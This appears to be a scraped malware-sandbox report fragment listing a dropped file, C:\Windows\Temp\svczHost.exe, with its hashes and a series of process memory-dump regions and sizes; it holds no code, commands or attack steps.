121abd58637b13aaaceae9482e3565e6a7453b26a1b79c090c1f499743ba08a0d7edf4a1e4b21924978e20cd0155cf828c23ace31e0c661eb09e278621e47d8d

Download Submit
C:\Windows\Temp\svczHost.exe

Filesize
10.3MB

MD5
00056b8b92c3c0857fd33918b1d00ecc

SHA1
fcc6cec164239f8a799482a0478d67191d73154d

SHA256
e916b412760ea5b9ab66df77808337a632c130a3d1820df2a2d4d1e5e28bc21c

SHA512
30e2e8252e7c9a411832924f7167951e5cd33807023b2a9a2a7aff291e153f3f3244367e52e94d57dcec61b7045fc223d2eea965daecb7d76e3b1c38cbba9c6f

Download Submit
memory/964-19-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/964-58-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/964-20-0x0000018FA7B70000-0x0000018FA7B80000-memory.dmp

Filesize
64KB

Download
memory/964-21-0x0000018FA7B70000-0x0000018FA7B80000-memory.dmp

Filesize
64KB

Download
memory/964-22-0x0000018FA7B70000-0x0000018FA7B80000-memory.dmp

Filesize
64KB

Download
memory/964-11-0x0000018FA7AE0000-0x0000018FA7B02000-memory.dmp

Filesize
136KB

Download
memory/964-14-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/964-15-0x0000018FA7B70000-0x0000018FA7B80000-memory.dmp

Filesize
64KB

Download
memory/964-17-0x0000018FAA0B0000-0x0000018FAA226000-memory.dmp

Filesize
1.5MB

Download
memory/964-16-0x0000018FA7B70000-0x0000018FA7B80000-memory.dmp

Filesize
64KB

Download
memory/964-18-0x0000018FAA440000-0x0000018FAA64A000-memory.dmp

Filesize
2.0MB

Download
memory/1664-59-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/1664-53-0x0000022EA9D90000-0x0000022EA9DA0000-memory.dmp

Filesize
64KB

Download
memory/1664-42-0x0000022EA9D90000-0x0000022EA9DA0000-memory.dmp

Filesize
64KB

Download
memory/1664-41-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/1664-61-0x0000022EA9D90000-0x0000022EA9DA0000-memory.dmp

Filesize
64KB

Download
memory/1664-62-0x0000022EA9D90000-0x0000022EA9DA0000-memory.dmp

Filesize
64KB

Download
memory/1664-68-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/2356-52-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/2356-57-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download
memory/2356-34-0x000001C6D7C20000-0x000001C6D7C30000-memory.dmp

Filesize
64KB

Download
memory/2356-24-0x000001C6D7C20000-0x000001C6D7C30000-memory.dmp

Filesize
64KB

Download
memory/2356-23-0x00007FF99ED70000-0x00007FF99F831000-memory.dmp

Filesize
10.8MB

Download